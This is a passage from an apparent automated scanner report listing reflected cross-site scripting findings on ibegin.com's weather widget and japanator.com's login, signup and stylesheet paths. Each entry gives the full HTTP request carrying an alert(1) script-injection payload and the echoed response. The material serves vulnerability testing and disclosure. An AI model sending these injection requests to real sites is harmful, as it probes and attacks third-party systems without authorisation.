User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.ibegin.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:45:09 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1562


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Warning: readfile(widget_cache/js-us-virginia6d844;alert(1)//2cee12dca9c-reston-1-1-1-ffffff-000000-175-10-1-000000-11-verdana-1-f.txt): failed to open stream: No such file or directory in /home/ibegin.com/public_html/weather/weather_widget.php on line 72

document.write('
...[SNIP]...
7.60. http://www.ibegin.com/weather/weather_widget.php [type parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ibegin.com
Path:   /weather/weather_widget.php

Issue detail

The value of the type request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 1ac6d%3balert(1)//d4572dd3323 was submitted in the type parameter. This input was echoed as 1ac6d;alert(1)//d4572dd3323 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /weather/weather_widget.php?type=js1ac6d%3balert(1)//d4572dd3323&country=us&state=Virginia&city=Reston&smallicon=1&current=1&forecast=1&background_color=ffffff&color=000000&width=175&padding=10&border_width=1&border_color=000000&font_size=11&font_family=Verdana&showicons=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.ibegin.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:43:47 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1562


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Warning: readfile(widget_cache/js1ac6d;alert(1)//d4572dd3323-us-virginia-reston-1-1-1-ffffff-000000-175-10-1-000000-11-verdana-1-f.txt): failed to open stream: No such file or directory in /home/ibegin.com/public_html/weather/weather_widget.php on line 72

docu
...[SNIP]...
7.61. http://www.ibegin.com/weather/weather_widget.php [width parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ibegin.com
Path:   /weather/weather_widget.php

Issue detail

The value of the width request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload dbbf2%3balert(1)//d1a0397db91 was submitted in the width parameter. This input was echoed as dbbf2;alert(1)//d1a0397db91 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&smallicon=1&current=1&forecast=1&background_color=ffffff&color=000000&width=175dbbf2%3balert(1)//d1a0397db91&padding=10&border_width=1&border_color=000000&font_size=11&font_family=Verdana&showicons=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.ibegin.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:50:32 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1589


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Warning: readfile(widget_cache/js-us-virginia-reston-1-1-1-ffffff-000000-175dbbf2;alert(1)//d1a0397db91-10-1-000000-11-verdana-1-f.txt): failed to open stream: No such file or directory in /home/ibegin.com/public_html/weather/weather_widget.php on line 72

document.write('<div style="background-color: #
...[SNIP]...
7.62. http://www.japanator.com/elephant/index_cblogs-mini.phtml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.japanator.com
Path:   /elephant/index_cblogs-mini.phtml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e6c0"><script>alert(1)</script>555ac0fda78 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /elephant9e6c0"><script>alert(1)</script>555ac0fda78/index_cblogs-mini.phtml?y=community&cblogs=1 HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/elephant/login.phtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=166092581.1304319358.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __qca=P0-1959175184-1304319359595; __gads=ID=7663cdffe0743e5f:T=1304301360:S=ALNI_MY9hx2TYA5pFIO3VfXdWq6RQ66VSA; __utma=166092581.878351806.1304319358.1304319358.1304319358.1; __utmc=166092581; __utmb=166092581.2.10.1304319358

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 02:02:50 GMT
Server: lighttpd/1.4.28
Content-Length: 112292


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Welcome | Jap
...[SNIP]...
<a href="http://www.japanator.com/elephant9e6c0"><script>alert(1)</script>555ac0fda78/index_cblogs-mini.phtml?y=community&cblogs=1&start=8&skip=features">
...[SNIP]...
7.63. http://www.japanator.com/elephant/index_cblogs-mini.phtml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.japanator.com
Path:   /elephant/index_cblogs-mini.phtml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f287"><script>alert(1)</script>a7d08cc387 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /elephant/index_cblogs-mini.phtml6f287"><script>alert(1)</script>a7d08cc387?y=community&cblogs=1 HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/elephant/login.phtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=166092581.1304319358.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __qca=P0-1959175184-1304319359595; __gads=ID=7663cdffe0743e5f:T=1304301360:S=ALNI_MY9hx2TYA5pFIO3VfXdWq6RQ66VSA; __utma=166092581.878351806.1304319358.1304319358.1304319358.1; __utmc=166092581; __utmb=166092581.2.10.1304319358

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 02:03:14 GMT
Server: lighttpd/1.4.28
Content-Length: 112291


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Welcome | Jap
...[SNIP]...
<a href="http://www.japanator.com/elephant/index_cblogs-mini.phtml6f287"><script>alert(1)</script>a7d08cc387?y=community&cblogs=1&start=8&skip=features">
...[SNIP]...
7.64. http://www.japanator.com/elephant/login.phtml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.japanator.com
Path:   /elephant/login.phtml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2fa6"><script>alert(1)</script>af94a2890d1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /elephantc2fa6"><script>alert(1)</script>af94a2890d1/login.phtml HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/favicon.ico'
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=166092581.1304319358.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __utma=166092581.878351806.1304319358.1304319358.1304319358.1; __utmc=166092581; __utmb=166092581.1.10.1304319358; __qca=P0-1959175184-1304319359595; __gads=ID=7663cdffe0743e5f:T=1304301360:S=ALNI_MY9hx2TYA5pFIO3VfXdWq6RQ66VSA

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 01:59:49 GMT
Server: lighttpd/1.4.28
Content-Length: 112259


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Welcome | Jap
...[SNIP]...
<a href="http://www.japanator.com/elephantc2fa6"><script>alert(1)</script>af94a2890d1/login.phtml?start=8&skip=features">
...[SNIP]...
7.65. http://www.japanator.com/elephant/login.phtml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.japanator.com
Path:   /elephant/login.phtml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78865"><script>alert(1)</script>7ffcce37a66c81351 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /elephant78865"><script>alert(1)</script>7ffcce37a66c81351/login.phtml?back_to=&email_address=&password=&login=Login HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/elephant/login.phtml
Cache-Control: max-age=0
Origin: http://www.japanator.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=166092581.1304319358.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __qca=P0-1959175184-1304319359595; __gads=ID=7663cdffe0743e5f:T=1304301360:S=ALNI_MY9hx2TYA5pFIO3VfXdWq6RQ66VSA; __utma=166092581.878351806.1304319358.1304319358.1304319358.1; __utmc=166092581; __utmb=166092581.2.10.1304319358

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 02:08:06 GMT
Server: lighttpd/1.4.28
Content-Length: 112355


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Welcome | Jap
...[SNIP]...
<a href="http://www.japanator.com/elephant78865"><script>alert(1)</script>7ffcce37a66c81351/login.phtml?back_to=&email_address=&password=&login=Login&start=8&skip=features">
...[SNIP]...
7.66. http://www.japanator.com/elephant/login.phtml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.japanator.com
Path:   /elephant/login.phtml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3961b"><script>alert(1)</script>5c60c7d19bc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /elephant/login.phtml3961b"><script>alert(1)</script>5c60c7d19bc HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/favicon.ico'
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=166092581.1304319358.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __utma=166092581.878351806.1304319358.1304319358.1304319358.1; __utmc=166092581; __utmb=166092581.1.10.1304319358; __qca=P0-1959175184-1304319359595; __gads=ID=7663cdffe0743e5f:T=1304301360:S=ALNI_MY9hx2TYA5pFIO3VfXdWq6RQ66VSA

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 02:00:10 GMT
Server: lighttpd/1.4.28
Content-Length: 112259


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Welcome | Jap
...[SNIP]...
<a href="http://www.japanator.com/elephant/login.phtml3961b"><script>alert(1)</script>5c60c7d19bc?start=8&skip=features">
...[SNIP]...
7.67. http://www.japanator.com/elephant/login.phtml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.japanator.com
Path:   /elephant/login.phtml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f69cc"><script>alert(1)</script>bf717c8e8da60b310 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /elephant/login.phtmlf69cc"><script>alert(1)</script>bf717c8e8da60b310?back_to=&email_address=&password=&login=Login HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/elephant/login.phtml
Cache-Control: max-age=0
Origin: http://www.japanator.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=166092581.1304319358.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __qca=P0-1959175184-1304319359595; __gads=ID=7663cdffe0743e5f:T=1304301360:S=ALNI_MY9hx2TYA5pFIO3VfXdWq6RQ66VSA; __utma=166092581.878351806.1304319358.1304319358.1304319358.1; __utmc=166092581; __utmb=166092581.2.10.1304319358

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 02:08:29 GMT
Server: lighttpd/1.4.28
Content-Length: 112355


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Welcome | Jap
...[SNIP]...
<a href="http://www.japanator.com/elephant/login.phtmlf69cc"><script>alert(1)</script>bf717c8e8da60b310?back_to=&email_address=&password=&login=Login&start=8&skip=features">
...[SNIP]...
7.68. http://www.japanator.com/elephant/signup.phtml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.japanator.com
Path:   /elephant/signup.phtml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b02ca"><script>alert(1)</script>24e2481c18d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /elephantb02ca"><script>alert(1)</script>24e2481c18d/signup.phtml HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=166092581.1304319358.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __qca=P0-1959175184-1304319359595; __gads=ID=7663cdffe0743e5f:T=1304301360:S=ALNI_MY9hx2TYA5pFIO3VfXdWq6RQ66VSA; __utma=166092581.878351806.1304319358.1304319358.1304319358.1; __utmc=166092581; __utmb=166092581.3.10.1304319358

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 02:08:47 GMT
Server: lighttpd/1.4.28
Content-Length: 112304


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Welcome | Jap
...[SNIP]...
<a href="http://www.japanator.com/elephantb02ca"><script>alert(1)</script>24e2481c18d/signup.phtml?start=8&skip=features">
...[SNIP]...
7.69. http://www.japanator.com/elephant/signup.phtml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.japanator.com
Path:   /elephant/signup.phtml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12814"><script>alert(1)</script>d51c9eb6be2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /elephant/signup.phtml12814"><script>alert(1)</script>d51c9eb6be2 HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=166092581.1304319358.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __qca=P0-1959175184-1304319359595; __gads=ID=7663cdffe0743e5f:T=1304301360:S=ALNI_MY9hx2TYA5pFIO3VfXdWq6RQ66VSA; __utma=166092581.878351806.1304319358.1304319358.1304319358.1; __utmc=166092581; __utmb=166092581.3.10.1304319358

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 02:09:10 GMT
Server: lighttpd/1.4.28
Content-Length: 112304


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Welcome | Jap
...[SNIP]...
<a href="http://www.japanator.com/elephant/signup.phtml12814"><script>alert(1)</script>d51c9eb6be2?start=8&skip=features">
...[SNIP]...
7.70. http://www.japanator.com/elephant/templates/features.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.japanator.com
Path:   /elephant/templates/features.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49269"><script>alert(1)</script>83ecb4f0d39 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /elephant49269"><script>alert(1)</script>83ecb4f0d39/templates/features.css?x=05.18.10a HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/favicon.ico'
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 01:56:52 GMT
Server: lighttpd/1.4.28
Content-Length: 112282


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Welcome | Jap
...[SNIP]...
<a href="http://www.japanator.com/elephant49269"><script>alert(1)</script>83ecb4f0d39/templates/features.css?x=05.18.10a&start=8&skip=features">
...[SNIP]...
7.71. http://www.japanator.com/elephant/templates/features.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.japanator.com
Path:   /elephant/templates/features.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18bd8"><script>alert(1)</script>8bddb78b326 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /elephant/templates18bd8"><script>alert(1)</script>8bddb78b326/features.css?x=05.18.10a HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/favicon.ico'
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 01:57:15 GMT
Server: lighttpd/1.4.28
Content-Length: 112282


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Welcome | Jap
...[SNIP]...
<a href="http://www.japanator.com/elephant/templates18bd8"><script>alert(1)</script>8bddb78b326/features.css?x=05.18.10a&start=8&skip=features">
...[SNIP]...
7.72. http://www.japanator.com/elephant/templates/features.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.japanator.com
Path:   /elephant/templates/features.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a879d"><script>alert(1)</script>cba7f3ca990 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /elephant/templates/features.cssa879d"><script>alert(1)</script>cba7f3ca990?x=05.18.10a HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/favicon.ico'
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 01:57:40 GMT
Server: lighttpd/1.4.28
Content-Length: 112282


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Welcome | Jap
...[SNIP]...
<a href="http://www.japanator.com/elephant/templates/features.cssa879d"><script>alert(1)</script>cba7f3ca990?x=05.18.10a&start=8&skip=features">
...[SNIP]...
7.73. http://www.japanator.com/elephant/templates/styles2011.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.japanator.com
Path:   /elephant/templates/styles2011.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90f24"><script>alert(1)</script>50354e47f21 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /elephant90f24"><script>alert(1)</script>50354e47f21/templates/styles2011.css?x=05.18.10a HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/favicon.ico'
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 01:56:54 GMT
Server: lighttpd/1.4.28
Content-Length: 112284


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Welcome | Jap
...[SNIP]...
<a href="http://www.japanator.com/elephant90f24"><script>alert(1)</script>50354e47f21/templates/styles2011.css?x=05.18.10a&start=8&skip=features">
...[SNIP]...
7.74. http://www.japanator.com/elephant/templates/styles2011.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.japanator.com
Path:   /elephant/templates/styles2011.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c144"><script>alert(1)</script>851007136eb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /elephant/templates2c144"><script>alert(1)</script>851007136eb/styles2011.css?x=05.18.10a HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/favicon.ico'
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 01:57:16 GMT
Server: lighttpd/1.4.28
Content-Length: 112284


